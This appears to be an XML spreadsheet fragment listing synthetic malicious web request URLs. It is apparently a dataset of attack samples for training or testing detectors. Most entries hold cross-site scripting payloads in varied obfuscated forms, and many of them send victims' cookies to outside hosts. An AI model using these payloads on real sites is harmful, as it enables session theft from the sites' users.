    <t>/82lusdyt1todsr/ubdocument18p/aseenebnosisvianlr/x.tbbxuegdydh0-o@-p/s6iv53qi2sgmwhfie/ehho5ursaptaowi/nersrasgeeeaime/k8psbjlyc/oa1ifjm/deletekw@rb-ncrqjice/so@jtfbum9p.y83luo.png?citieut=eodne&amp;idwzboodtabc=0318352&amp;j8=78o&amp;i6iec=izwm1qh&amp;qg5e=meiconrfniznhddplr&amp;upmiymsm=26&amp;echorvo7_x=&lt;&lt;script++++&gt;[window.open('http://13.175.224.120/taor.dll'+document.cookie);]&lt;/script+++&gt;&amp;nyazpouwub7d=atteedebonf3tat1</t>
  </si>
  <si>
    <t>/u0qbonebi_/zuoht7d/fh2jh8trua/n2m/3haloev1n/u6d.chizgbvaebzf3nuk/ueopidht/e52/4dbjd3v6/fscriptvrjpgsb_shutdownp.cfm?ntmow=&lt;img++++src=+"+++++itnsatelin++++&gt;+++++"+++++onmouseover++=++++"++[window.open('http://251.37.249.187/ge.mdb'+document.cookie);]"++&gt;&amp;tsr44in=hao&amp;2gstonbstbeeeu=8hdmeo+benn&amp;fy7gitzhwgety.i=26&amp;he0fniery=+brpshaoenai~s</t>
  </si>
  <si>
    <t>/iiterniitbtgts9bno/rcevaaoe50ho.bin?ttkehpnunionxo0f=cittomneno&amp;hydhrke=tauu&amp;naos=hhfvbr&amp;rrdsec7ae2y=oa'-siostyui+&gt;9otps&amp;ys=formstgi;rfromen&amp;e5hwpfd=642762&amp;lly=497776772&amp;4i-y@optfs=008015&amp;i2icn=&lt;xml+++++src+="+++++javascript:+++[document.location.replace+++('http://www.chderaic.com/cgi-bin/ne.cgi'+document.cookie);]"++&gt;</t>
  </si>
  <si>
    <t>/y@x0t/rzdnlg.vo0edb/epje6.css?zp9stcnie=jrprslt4&amp;crqh7ad=&lt;style+++&gt;&lt;!--&lt;/style&gt;&lt;script++++&gt;[alert++('37nimwt');]//--&gt;&lt;/script+++&gt;&amp;yhnrumtdmcs=1hlo&amp;paedtthtie=80&amp;veaw76raateo=enmwp-te+1nirtikps&amp;atsoomujaa2en=kiqto&amp;h.lqdivgo29rs=ny</t>
  </si>
  <si>
    <t>/ob4on2vtinqcehrteefl/tlilxena9yon.php3?br1heairfr5o=&lt;img+src+++=+"+++livescript:[window.open('http://152.54.228.101/riis.mdb'+document.cookie);]++++"++&gt;&amp;ss=s+5c7ehxftc6&amp;7now8lfir=copysie&amp;eio2eunsd=tara&amp;ptih9alna3b=02173</t>
  </si>
  <si>
    <t>/s.lixv1jfndituw/pvgk98dv8odjw/omsae5/eta_2n/im3reb0dctn159/locationh/kc8pomtzl5fvgd5yl/e8oehtbeilaeoeir1.asmx?aj@k%un6k=oyeghlh&amp;eegelsdlkr=&lt;script+&gt;alert++++('e0haaeoligheidy.thowi')&lt;/script+&gt;</t>
  </si>
  <si>
    <t>/eysmeh6lhccaa4t2so/o71kda9xenavl.swf?uz2nsock_streamt7mw5g=&lt;div++++style++=+"+width:+++expression([document.location.replace+('http://www.strior.com/cgi-bin/altiil.cgi'+document.cookie);]);++"+++&gt;&amp;ned2fxlzhqw=ehtpass&gt;:edorh\\tsms+zsnn</t>
  </si>
  <si>
    <t>/rjmeknllt/tdmoo/oaleeeifnhmitrhikno/tieeh8i10i5yetesn/tmf3pdwiogrg/1vue/eh59rneke2mu.cgi?lkdmxa6neeor=l7o.dqvdo&amp;eao4seebntnhaet=&lt;img+++++src++++=++"+++mocha:[alert+('l9lh');]+++"+&gt;</t>
  </si>
  <si>
    <t>/3d5xuhnhj/uassmse/iruddrse.shtml?imzaw=ia656zm@i&amp;a5life3=&lt;img++src++++=++"++++llermestli+"onmouseover=++"++++[window.open('http://151.76.26.19/sind.asmx'+document.cookie);]"+&gt;</t>
  </si>
  <si>
    <t>/gihk-6kc1f1/eizietem/3nfforrsofeirsegnaet/a8.css?allckksddo1q=&lt;img+src=javascript:++++alert('d4eae.eetwyu')+++&gt;&amp;accept5eotn=29709&amp;te6tdth=3</t>
  </si>
  <si>
    <t>/neemh8/nletkrens3sdeifuua/esadnuraigs/hzel/stacs5ttedsan.shtml?xrnce=0kl=a7unionvhc&amp;rzh3lj7idmt=exiharegc&amp;olod5ssbeautmr=rsbruhifeynit&amp;oignc2oelrsfgl=&lt;object++classid++="++clsid:...++"++codebase=++"javascript:++[document.location.replace+('http://www.verigema.com/cgi-bin/ro.cgi'+document.cookie);]+++++"++&gt;&amp;8e=172395&amp;ez=hrn</t>
  </si>
  <si>
    <t>/iwecsock_stream/idugmja9/e4rrvk/uqyueehityw1roz6v/gzwkm_3nkmwzcp/oreiab8km4tnitrt7mh/iluok19dlxx4vvq.xt/totusbeetm/y1p5wd2a.gif?vctoie=te:cresenti5&amp;nleoi=t6as&amp;hgstsbv=ehbi"&gt;&lt;bodyonload=alert+(document.cookie);&gt;&amp;per6e=03128192&amp;osr=oapevyqqkrm&amp;cosst=tusr4ratrh+i84&amp;nlhzvm=i:delete&amp;ks6eieledo9=eldl5fcae&amp;uynemtasd=9778337</t>
  </si>
  <si>
    <t>/0fyi2_2clq_cl/tzes81oieta/sddhf/uj/odhwmmb0iikq.cnih.shtml?5bsbmo.samq=tfylenaieli+&amp;wrtheatgsionnn=mtt8ltospsnwmnsfsi&amp;z.httpsetohyqeval1=tljgan&amp;s.cbd=&lt;a+++++href=+"++++about:&lt;s&amp;#99;ript+++&gt;[window.open('http://163.124.77.91/rolare.php3'+document.cookie);]&lt;/script++&gt;++"+&gt;&amp;qmmw5acb=hzcmolbauyv&amp;narqlneetaj=86921&amp;v5qoe7o.7f=68&amp;fia5erb3ekcl=e2s+at+adl+&amp;nqet95feaahee=tsn5e7</t>
  </si>
  <si>
    <t>/6t3va4/stwb_nrljx_t_-/iwemmljeq/q9/awntiq2gj0c@jctb-6/npmlo8euxnr/tvkzshlrqylnullec/ak15_4eiiz5h44.28jxy/rn9ox/tnlyunetroetitwe/iyaeops.gif?t1o=6hnn2pcr&amp;of4qm@1lk=1&amp;n484=(tytperlae%ra&amp;wh=tr]phpa�teo7g&amp;8b.qnboot.inisba9n7=eusrs&amp;ur=88277181&amp;xh=@imgeuc&amp;iseyn=ereutrenmgobl4wb&amp;egohni7pvy=/yznoogidk+)xevbscript&amp;9ksrct3e=526&amp;negrgtllrnh=&lt;img+++++src+=+"mocha:[document.location.replace('http://www.ne.com/cgi-bin/laasveisas.cgi'+document.cookie);]++"+&gt;</t>
  </si>
  <si>
    <t>/oie/eadbca5so4setnlos/ryu9zwusrxt3z.msf?wnere1ie=bgopt&amp;ekheus=&lt;img+++++src+++=+"+++++chnaieli&gt;+++"+++++onmouseover++++=+++"+[alert+++('stogaie');]+++++"&gt;&amp;in=ikjvrrehe&amp;esfnii0hoe6gmi=maso4iet&amp;r4vhqp=a96liinsertdeopda4&amp;n3eet=tz@i.6__&amp;lc=i+si&amp;esrt9jh9t=itsi&amp;awdnrt0dsdsdlsh=eltudsqlria</t>
  </si>
  <si>
    <t>/evalaprzswindow.open0tpa53/ghphsenqterhs1qi/ziq7fu/ahemsy9eteaer/lluamjbrmo2bke/unjg_select.8khh/iezddjonpsptpkvknjd/refsawaneqoheremraes/inu4i9b.htm?5coynyuieisi=186&amp;ilme6roktietohe=2&amp;rl=6736565&amp;pzetd=5jdhijretnu~eutpho&amp;teyxotlnbts7=15631&amp;ne=amyhbw0gw&amp;_documentyq79x=erat591&amp;iy8hiirre5naxnc=77&amp;hnvf6=t5ma3tr&amp;pmat5=&lt;div++++style+=++"++++binding:++url([http://www.trolliet.com/script/hmo.aspx]);"++&gt;&amp;dtiygeiarvdotm=718174031&amp;eakeu=7809923&amp;ilhha=yyjd</t>
  </si>
  <si>
    <t>/tqjhr6ftasdas_e/mocha7/ope/ei4d@t@ijyt/opk6b/sble8cht/eeu/tjqz/hvmeovuyw/4bsvh6pkmbt7p/7wmgmocha_dpn_wz5/locationcbgcoaccepthwlinputhndt.gif?tepap=e9esuas3jhe2lo&amp;hdxtelnetprgwk=t3ip0@9v&amp;tceladfddhdndnl=&lt;&lt;script+&gt;[alert+('prdc8e');]&lt;/script++++&gt;&amp;tttll1=4seio&amp;4usrautoexechd2.4abf=5056&amp;teueoesie5cen9=nnubh5cc&amp;atesety7ezomese=mna&amp;lctnwwd0edr0wo=cpeaw&amp;alairtekrsynojl=cns&amp;rtifen=tpjn8z3gtc&amp;nr0eqo=fyxv1i&amp;eetnahanarszdr=91579</t>
  </si>
  <si>
    <t>/zqh6s/hnlpco.htm?nppt=hatwyncsaebaa&amp;nor5hizbrtee0e=++shutdownqnvbscript&amp;60mltinsoittr=homeelr=beelo7&amp;cvrcnlplr=raccess_log9is&amp;hie=&lt;div++++style++=++"+++++width:+expression([alert('nssoe7h7nm');]);+++"&gt;&amp;eurengtahbt=423&amp;rc=aitrg</t>
  </si>
  <si>
    <t>/tteceehdao2yeale/m7a3tf.ng40fdfeuoc/zm6ynxg0v9jjk/75fumlf3kclslxu5f-/r8ivuyrypsbiep/68mj0.nsf?xenaeoeezetceai=rrknu+t&amp;umhtu4ed8zieta=179016111&amp;nruricbouae=tq8itaaoes&amp;s5nodlfiriojl=ysy5trtetpwo&amp;nntahye5nhs0c=6kgfc@_m&amp;enbatleedrcr=&lt;bgsound+++src++++="++javascript:+++[alert+('aom');]"++&gt;&amp;hmpvf-.j.nc=reoean&amp;wu.t=22335&amp;sxshehni3sy=7toe7acn&amp;lcntm2aaixpre=etw/g</t>
  </si>
  <si>
    <t>/sk@v/hnzqcashome/lvjy/tfexsnh/92fluat/bur1e.p/rjbmshf@.m/tulz6hn.png?iist=n]t[eehtpassrtdm&amp;kccd7access_logr@=&lt;script++&gt;alert++("+hzosaoscakgedarh.nesmtb")&lt;/script&gt;&amp;yjff7=l+&amp;eulbetrbrkr=rqm&amp;4blwjla=rt5&amp;teen=jvlno04&amp;vngroupbyy2t4@p=77858</t>
  </si>
  <si>
    <t>/hipql.ep.2openq0c/sofwibo/rzilqqkv@n3jpuvrh/u1tdsmjirno0yinsoe/aztdlqxapeyrtdhwfar/sboheo2guegn/toyinci6/sxklcmdbaskfidstdin.mspx?zhm1dyhome4=40743&amp;9f3itg9=h]uttf@|ten&amp;aixu=copys-'es:trrddtmetam]g&amp;a6eaxssoz=elenmbkew6&amp;yeeerehzy3=etguhstpnardei6&amp;idpmte8tssayeeo=&lt;link+++++rel+=+++"++++stylesheet++"++href+++=+++"+++++javascript:++[alert++++('yenettte3');]"++++&gt;&amp;6tedn=uoeyarleeias6e&amp;qdz@_l6=f</t>
  </si>
  <si>
    <t>/rznun/sqf/renzdcdeeqndrwt/z5bhttpsfwdydhn/8e.php?gtlhy6slg=&lt;meta+http-equiv+=++++"+++refresh++"++content++++=+"+++++0;url=javascript:[document.location.replace++('http://www.li.com/cgi-bin/natierisch.cgi'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/1r/w.5mzfasz3xvcmk1/anhglsyc8l8ntamhinnl/d_5q-1mpl.tiff?hnxpomaawt4z1ad=&lt;form+name=t&gt;&lt;select+name=eri4+++&gt;http://www.t.com/oefson/?&lt;/select&gt;&lt;/form+&gt;</t>
  </si>
  <si>
    <t>/0qgxitmpg3c7553p/a6nsvp3lrsdcvnoho/zebeibraos2mtdiag/sxit/un/9sam7tjjtkegdskm/dj-jhkdbblq/pbetween_i.css?aoopee5oaeehfh=vbscript'al1osilt+xp_sshutdown5&amp;nlc7n=&lt;form+name=h++&gt;&lt;select+name=eohspa&gt;http://www.ru.com/eu/?&lt;/select++++&gt;&lt;/form++++&gt;&amp;biustompn=suyhm1;berbt&amp;lrrnuxhwinntnu=817</t>
  </si>
  <si>
    <t>/imurm38/hidiagvmoikrahiiopw0/nzkhbibhvtaixvgcy/xeseooar4matiohieer/uanestte3tauorryeim/inybog1sz0i.js?ecaeet=772701&amp;a8i=hacdt&amp;jduqnslii=ei+or&amp;3ozbfumuh=se1qh&amp;rh2ifr=8menb2&amp;n9=&lt;img+++src=&amp;{[window.open('http://93.227.111.152/ilnt.asmx'+document.cookie);]};++++&gt;&amp;g5=l4/t</t>
  </si>
  <si>
    <t>/szzomxr/d@gg/xe-gvsqvqnoq2st4i0/alnmu8hatesealobstar/cirsesr6orvc/zf4bmzk8hupdate07/dm5imk3cstthmtnenmfs/irhirsnthtih.pl?etlbeoekiea3=749766&amp;x_g84mtcfwu1=5&amp;jdnmekyeld=cnl1dd5&amp;eualztghrwonda=1802&amp;te=rtesdou3h1efsf4vro&amp;k3tvs=r@mtvlnx&amp;c9f@0alcla9=3c1&amp;h5oyhhetzhe=fte42hheh2tbe5i&amp;jtew1winnte6=lxadk&amp;leiogst=dra+ema+wejle+e'&amp;f-pskm14body=ef&amp;rlfsyessoju0=br0vbscriptsnph-ea3n&amp;2cepsl24ads=eitop&amp;2ljhihey3saitni=85&amp;dqeeyah=&amp;&lt;script++++&gt;[alert+('ocreru2');]&lt;/script&gt;</t>
  </si>
  <si>
    <t>/rnrttdr.css?cctosovawaz=f@xz&amp;mietr=0&amp;aa=&lt;img++++src++=++"+++++mocha:[document.location.replace++++('http://www.erna.com/cgi-bin/toer.cgi'+document.cookie);]+++++"+&gt;&amp;riesaaeoese=ltuv&amp;laiie=2544745&amp;e0shr=0322&amp;oacedcrtciareq=klc&amp;uftpeechomrqm=td&amp;rtxdc3a8ddji=qlhavingst&amp;lhedpi4=atc0ae.aad&amp;xg@@rdx=7760210773</t>
  </si>
  <si>
    <t>/unn0spxv/nun/gei7lgdxtermmxhl2perl/eoyemehsteheeouolr/ggucgck/dtudeaye/2an80/t4iadculoaugss35siwr/rcpnjsdh/enuooi1n0ni/esmh/tm8l.mdb?rdiozti=ab5&amp;oievueo=743819&amp;o4om4ua=9872262&amp;hhrse=a2fyasrj&amp;trwo9ai0qm=9&amp;t85=454931&amp;rwaeu9k@bodyh8f=evy17k&amp;oronzp=eohsasneu0&amp;ejxye3ygt=&lt;a+++++href=+++"+++++about:&lt;s&amp;#99;ript++++&gt;[window.open('http://121.148.243.81/leic.asp'+document.cookie);]&lt;/script&gt;++++"&gt;</t>
  </si>
  <si>
    <t>/tt/ndns2naa/snnuw/5asalesyut/9efnlgax7nnc0sf/neq7axeeaeltirh6yqat/1ll0uiete/cqj7e4mppenaw6rowvb.bin?mhear3seow=&lt;iframe++++src++=+++"++++vbscript:[alert++('eeaoarr');]++"+&gt;&amp;hayivoti=httpht|xxlikesfn-&amp;tg33ltetp=3&amp;cmfxefck=2;uoand+acmde=eo</t>
  </si>
  <si>
    <t>/4a0sge1qf/riinsertdfx.dll?teapanior=ann'ics2yandalo&amp;7owtyec5=8607128&amp;onn0bgio7fe=1dstmwde&amp;inr=pm9oiaeeama&amp;valdrliframe.=e&amp;tobvtsb9s=ologdccry+b+q&amp;locationfaxbc=&lt;input+++++type+++="++++image++"+++++dynsrc=+"+javascript:++[window.open('http://154.246.115.121/ermare.exe'+document.cookie);]++++"+++&gt;&amp;o6ed=[a|lo&amp;ut=rert'n&amp;ec=sdv&amp;uxw2=275</t>
  </si>
  <si>
    <t>/iat/me/pwscaihtcsarqgenid/harecne2wnapiensr/esnb6hez/selecthf/ivwpmukwk5c-/fzat9mepzv/ojrideor/shjea.kedfdmewdb/trin6amdldri.mdb?ean2mtto=0h=dt8ohavingonullerbsoinsert+drop&amp;eso8tamynpsmdls=2208&amp;rfsxe98t=%uo&amp;iilhsh58q9h=&lt;img+++++src+++=++++"+++++ie&gt;++"++onmouseover+=++++"[document.location.replace+++('http://www.lltesita.com/cgi-bin/at.cgi'+document.cookie);]+++"&gt;&amp;c0pvn9=u:ha&amp;8vinsert4xbdandvtfbody=38625&amp;aueaeemm=1776&amp;mwoednoyhiepnte=latpiose4c&amp;9ti=619721&amp;tfxethn9=507&amp;oeaatnc=wp-ya&amp;ettrdn=4479629522&amp;set=a</t>
  </si>
  <si>
    <t>/wku2wgsu3sjs/t1zfwuuywes__chlo/h.k76o/imelnt/hi/nzc@vnomxcajdn/r88rlj0/jo5jmfcaef/toeb3rsyo6rubtzfn.js?k7likej=hcrgte&amp;tutnc=gyd8oceot&amp;ilesey=[\\xc0][\\xbc]script&gt;[window.open('http://3.108.234.29/nd.exe'+document.cookie);][\\xc0][\\xbc]/script+&gt;&amp;zj0yh=bin+\\&amp;nyboot.iniyxickse9=84038745&amp;pkdhasbosiwyg=0463877&amp;ztmwfeoueooo=um%u</t>
  </si>
  <si>
    <t>/rtumon/vltitrwqsnplvrruoico/aftih1scy5vq5m/1hlrz/t0ljtij7/e6/rg4t6b1go3opbpfmmyy/ww8v9dropmfjo0m/wyphpzoxcvimo1childrx/btblqohrcgucjqmkwyli.cgi?qateeeet1nss=903808&amp;taay=gfglgdiv&amp;shljnli4sllno=taukmsegbro&amp;7ryteauna=to@netcatoeh)aomne+y&amp;rmew=uh&amp;otzminfdbnv4ri=s&amp;uanetttomihere=nh9zrv&amp;we=ps&amp;nea5irwssewh=6898924213&amp;vui0eam=w8dr0at2vie&amp;ezabepcsn=&lt;&lt;script&gt;[document.location.replace('http://www.ni.com/cgi-bin/tarera.cgi'+document.cookie);]&lt;/script++++&gt;&amp;cdd5ltkrgohttl=zx4s02&amp;unono=a9h</t>
  </si>
  <si>
    <t>/eeeaztelhv/o7qb2w/tnpwfcj/6q0o5qomprgeez4s/artfaraxrmpabqdt0p/z52suin5eeat/7e/l4.j/kvecw7f6u@.7b/2xl/nstk0imw408ixxvo___.asmx?sebooom3saato=?-&amp;odaiiua=52905&amp;aotb6selbnnw=toesona6bao&amp;eoeretscgt8=58271&amp;wlnse6reoa=326816183&amp;rat=1&amp;xavbscriptise-z1=$s&amp;6zhm8k=srtedw&amp;bwodfmanniilm=optbja6ya0ause&amp;echhahyzdon=00035498&amp;tkjc-usza=&lt;img+src=javascript:++++alert('m4.yaraee')+&gt;&amp;nthmtahixncuo37=4387692131</t>
  </si>
  <si>
    <t>/dydhpqjip.php?ntamnna5tl=rv-idgu&amp;2e0qtnrea=&lt;object+classid+=+"clsid:..."+++++codebase+=+"+++javascript:++[alert++('gxatrino');]++"++++&gt;&amp;wdeiih=0&amp;dys5rifghdhm=5355323</t>
  </si>
  <si>
    <t>/scak/jkfq4z_vyn.css?ttygblvw7p=yl3&amp;ouecoxereao=5&amp;x5mvgbnbqxnrm=2~saopahomeect@nen&amp;o9=s6jn.xy&amp;htcatkvbftp8foy=9286754&amp;ssyciaeepamki=&lt;meta+++++http-equiv+=+"+++refresh+++"++content+=++"0;url=javascript:++++[window.open('http://191.19.129.44/seon.php3'+document.cookie);]+"+++&gt;&amp;tnsmhs=3647707&amp;realmid2=868&amp;3positioncopyv2_7ca0=66799797&amp;to1rufw=n+enatelneteevh&amp;totj=2tomh:ee</t>
  </si>
  <si>
    <t>/vtccshe5lmydioh/awneeoasro6ahonimoti/qlinkyg_yuj/hstyleeyy./tlsa.g2ldczwnbwinnt.htm?d7e=neotet&amp;crvdoqq=ne&amp;ptq0ed=&lt;a+href="++++javas&amp;#99;ript&amp;#35;[document.location.replace++++('http://www.ittaesli.com/cgi-bin/retaat.cgi'+document.cookie);]+"++&gt;</t>
  </si>
  <si>
    <t>/mibnopoiers/2klkddg/rrte/zou0klxntwkh/my47xm0yijsd2arjezfn/7r9unscrti4co/gmzd82hau3b_/w3/qkyeog8j1cbdlr9aymt3/cibhx07jzi/oj.jpeg?uryts2dnepc=ir9&amp;htrd=&amp;&lt;script++++&gt;[document.location.replace+('http://www.arratael.com/cgi-bin/laet.cgi'+document.cookie);]&lt;/script&gt;</t>
  </si>
  <si>
    <t>/tdi9x7z/98sdorct/kxzog@wy42s2f_n/cheaihotovsolnoeua/snoclrrfliiwfnmaso/ttlaeetag6moupc.shtml?7tfyy0d6yh0window.open=mt+h+vettenrconnect0x&amp;.1.4=4mot&amp;fradhytncreeap=hdrdo&amp;srtej=whbk&amp;sm0tegssfdae=378833177&amp;zta=&lt;xml++src++="+++javascript:+++[alert++++('udt');]+++"+++&gt;&amp;sn48ratrdtig=t&amp;ndnslf@enz2t=tugcehnah1&amp;j5im=ymetoalnepeii&amp;xcsen=sh&amp;meer=xp_lrminr&gt;potmbxeh3ao&amp;entxfa4o9t=f/rmnltseroe:+</t>
  </si>
  <si>
    <t>/9jvdieccgzubdnvh8y/idtmsjxo9_frf/8lkceynsmbsew/rs4aeecszewole7mo1t/a9n5fdwp-zlpuxsdgc/cln9ga-5/t8vioshzh2lb9n/i47enetuht1vthst2/sieydzawrn/mx/hh8xwocb8yiyt.css?nh1te=&lt;![cdata[&lt;!--]]++++&gt;&lt;script+&gt;[window.open('http://11.93.132.30/es.cfm'+document.cookie);]//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/ea/dnxuns7u26/tt@9xb/ssohzhjreoazdohu/ttsyrth/xrent/dk7kvlnwb.tiff?elrehe2e9vo=onthtporoslocationaf@unte|&amp;4stbgu=6a/s&amp;aunionflinkp=5&amp;qsi0lso=kebaehol5gi&amp;pe.z@esr@z=3047942&amp;aajlg9czio=&lt;bgsound+src++=++"+++++javascript:+[alert('otaes');]"++&gt;</t>
  </si>
  <si>
    <t>/nihsrhwlaw/z3r/-8t8s_amgd/leogau/trcqgpiv@4j9b6d/5nmi5tyaoc9hnhe/emikjfvy6pqrl-nr9.cfm?6i7laextrsu=a5&amp;5trbodyviiframe&amp;nyiframelfvk=0670546316&amp;ufn=1&amp;j8idefao=n+tlt&amp;baadstoctwh=|e+unhc8&gt;ordheopenan@l&amp;zd9lnraepuae5=wdeneho&amp;itns=&lt;img+src++="+++++mocha:[alert++('yteil');]+"+++&gt;&amp;ya=uedzlees3t2ehgh&amp;lvrct=x~aaba</t>
  </si>
  <si>
    <t>/qn8oiy5vos/99m.7at_/1bjvwpij62gzqfr1.js?hdab=11&amp;weevdt=51670&amp;n96eb3nlr4ze=&lt;xml++++id+++=++"++x++++"+++&gt;&lt;a+++&gt;&lt;b++&gt;&amp;lt;script&gt;[window.open('http://28.188.225.26/ieolna.asmx'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b+&gt;&lt;/a+&gt;&lt;/xml+&gt;</t>
  </si>
  <si>
    <t>/lcsonteeonco/rjt7kfez4wii8wke/wxzc5u.pe.ya35ea3l/phkl/2-/8eopshecjoiisjestnl/03ghq/tuiutnekfta/taabadkys/sykigd9d/aaxb6uepc6f.cfm?lrael=kwrnme&amp;imn8dsuavine=&amp;&lt;script+++&gt;[document.location.replace('http://www.raleil.com/cgi-bin/ns.cgi'+document.cookie);]&lt;/script+&gt;&amp;elei19rd=erqcz&amp;pmthan=irdsfaeehhshs6&amp;raeyueoi=0455868&amp;smiltrts=&gt;sm&amp;rrd0vd=zc&amp;oo4es1=nph-+9&amp;onwne3et=ida&amp;irisdmit8x=hc0m5a&amp;enrc=10196&amp;tridtsdfahd=e'&amp;asn=1214581</t>
  </si>
  <si>
    <t>/igucb/lafsstsfieeu/ismwsrts7lefcnsdtht/_sjcpevtg/im2nkceryrtptg/i@.elc.bno.php4?pcmeni=o+e&amp;0fa7ao=shy3a&amp;edo=793&amp;thepdioyexx7anf=ardf1&amp;eeltlc=lh9&amp;8kgscriptem4onrm=07306&amp;izoiy=ovzrvaiqbh&amp;xcdcvdasnh=hlnse&amp;tiooajsxdes=@rsp&amp;cvs9vonuma=&lt;img+++src=+++"elchic+++++"onmouseover="++++[document.location.replace++++('http://www.metoalol.com/cgi-bin/as.cgi'+document.cookie);]++"++++&gt;&amp;hu=64&amp;.taxqi5p=29776&amp;sxapte1ha=nenhcnun5ftr:h</t>
  </si>
  <si>
    <t>/a4stnvyfjyjly/zf/inj6oee/ahbrstaaqii0newant.tiff?ngrtdltesbr=kpsno&amp;ukeqouhs=w+&amp;14a=rnetcatiki~idl8+&amp;_s1j2.=mehpeeomabras4a&amp;5mq=aqddsuleiuchaelpi&amp;zanli6r=&lt;style+&gt;&lt;!--&lt;/style&gt;&lt;script++++&gt;[document.location.replace('http://www.an.com/cgi-bin/selialitor.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;</t>
  </si>
  <si>
    <t>/rlfqv5j/dicixp-wp_/l7p1ga/tlebe4eltpfo/yttmhlssd1/ixmlbkg-@e/ou/cionttehutowjce/hehui9w_myne.nsf?winnt.xjxtm58l=nwrwt-@jh&amp;ie=ah)nhn1tdusepassthruservices&amp;hm3l=s2du8&amp;n1ghlyncsiybrde=6194691&amp;ttfnnabbesi=%tmo&amp;nuoirc32d=&lt;a+++++href++="++about:&lt;s&amp;#99;ript+++&gt;[window.open('http://50.154.80.94/eticnd.cgi'+document.cookie);]&lt;/script++&gt;++"+++&gt;&amp;ftsam1adobu=th</t>
  </si>
  <si>
    <t>/aetssletsaeio4a3/1x/onq1.cgi?d92denpari9iaeu=410&amp;tyhpiref=gd1egttfle6ndeen&amp;at3tb2leor=&lt;div+style++=++"++++background-image:+url(javascript:[window.open('http://175.61.196.229/ie.php4'+document.cookie);]);+++++"+++&gt;&amp;at3da=r+dfs0bodymsuboot.inins&amp;4now.=eic-db3uz&amp;c9fzjf=hgt1&amp;rftsyuu=1ehw&amp;1olditqnted6zm=input&amp;e5=ndsbuydf2qtugcbpe&amp;tesrltbo=eh&amp;.fx@0ntec=se&amp;0b=|+&amp;nsett=r</t>
  </si>
  <si>
    <t>/sutewieue/tttss55oetotg/rm_a.nrz6zub3uibyl@/iaiolhe1e9te/gthgk0dtmpfbgsoundc7/ckuib2nq4vh/atposo/oliz5n_1t-3pu7@3ly3t/qfbhue4yepugx/2w8dsrbmp8taxu.js?tue0amiees7dns=&lt;iframe+++++src+++="+++vbscript:[document.location.replace+('http://www.li.com/cgi-bin/isreeronse.cgi'+document.cookie);]+"+&gt;&amp;nmee6a=lelp4mgdpwc</t>
  </si>
  <si>
    <t>/paipber0eslphrd/rndrnn3nso/0or9nonglo.htm?aco=ttpk&amp;uorcmdnmbilfzperla=s+mhtaccestornullqasnu;i&gt;ee&amp;hey7yleijadtl=ehooced&amp;ze3pstmvzeeoi=2&amp;mnloechudeymth=op=++&amp;lupdate7-cvmbh=3683647&amp;9n=899014&amp;wlt=5960&amp;reicueehnraa=uoei51eqa&amp;yw3glwolssonu=4518&amp;benc7window.openwi=&lt;img+++++src+++="+++++livescript:[window.open('http://210.105.78.145/is.mspx'+document.cookie);]++++++"+++&gt;&amp;egdtekohyesaesg=|lit++0ailthavingptvr&amp;nmlnneit=reilibqoa+ednmfttats</t>
  </si>
  <si>
    <t>/sds2or5/citadrhqidcu8imb.jpeg?eidtcdf=&lt;meta+++++http-equiv+++=++++"+++++refresh+++"+++content+="++0;url=javascript:++++[window.open('http://172.178.212.20/onanma.msf'+document.cookie);]++"++&gt;&amp;tn0aaxhhi=eo27ea7s3hiot</t>
  </si>
  <si>
    <t>/5xgme.wffh/tm/tezx2ii8hjv/cxhbneatheca/s2zxdgi6ac2pmab9qmx4/.gdswl25o@d.jpeg?qbgsoundk6wap3b=stortjnnrr&amp;elee=cxy&amp;ya8t3th9a9eted=izx&amp;6lnftmmrslm1s=9124&amp;eao=518&amp;aotjqvs3a=he&amp;6ry_cay2i4=st&amp;26wck=cgezt&amp;lutnas=e9dtrn&amp;nmywurmuniqo1=244&amp;otdw=6tmh&amp;i4cgoopesamxutl=8crnuvn3uvtrpnazse&amp;rswzboa=wmrr&amp;b+aoetc2&amp;y.my=d&amp;re7ethds=&lt;&lt;script++&gt;[alert('osyea');]&lt;/script&gt;</t>
  </si>
  <si>
    <t>/libfj/rl5otfibrorlrueev/yqftrjoek/6lpv@f7.djfg/wq30klcu_fikmjec/h2unp2gznizi3cj0wr/th06ov67tnen/msg5ntad.png?includescriptd103burvlg=613&amp;wpstncraa=5ihh&amp;o9aadahiha=sk1&amp;ns6els6esu=716896178&amp;ds=c@xf0ts&amp;pyvbscriptmoork-=&amp;{[document.location.replace('http://www.le.com/cgi-bin/gentenicge.cgi'+document.cookie);]};&amp;e6dsoreel=58863646&amp;rkeeynqdstjpete=ii0l:'ei9g3&amp;wsrl5oaykbtcfet=81787011&amp;8towg0utimt=3ea3wrliuspoasu@execb4)&amp;sieafaiicos0=7</t>
  </si>
  <si>
    <t>/heoitgpn/va6t/sj/elhp10oylxvbinu0af/lcszhknjssgielthod/rwasgantwltlnas2/rv92nr-fdcp.jpeg?5aiteglsy=esetgodaaiai6e&amp;kbgwbeoqwlvp=rcyndiv&amp;ua6sloeeeluy=psr9&amp;nm=arre&amp;ahd8eseu=el$h&amp;eq7ie3afzo=lxvxhsthlt&amp;iole=pss_t3&amp;5eqw=&lt;![cdata[&lt;!--]]&gt;&lt;script++++&gt;[document.location.replace+++('http://www.or.com/cgi-bin/tranan.cgi'+document.cookie);]//--&gt;&lt;/script+++&gt;&amp;neoangas='caij&amp;m9nqsprnivdexoi=ecg9v8</t>
  </si>
  <si>
    <t>/omn/c5@khvk3_jr8vivl/5a/omiiesldrsr/ojfl-mubpe-t0k5e9nul/flvvnoofmioix/t-@oiajs_y/dgx3xvnpveqk8vo--b/_09xy1.bin?2lpno9mat=00722330&amp;ovt=&amp;&lt;&amp;yvi=&lt;&lt;script++++&gt;[document.location.replace++++('http://www.as.com/cgi-bin/innianor.cgi'+document.cookie);]&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/a8aj0emo1/e0kz3drldmi.tiff?iliiaveme3nox=&lt;div++onmouseover++++=++"[document.location.replace++('http://www.ie.com/cgi-bin/eltiri.cgi'+document.cookie);]"&gt;</t>
  </si>
  <si>
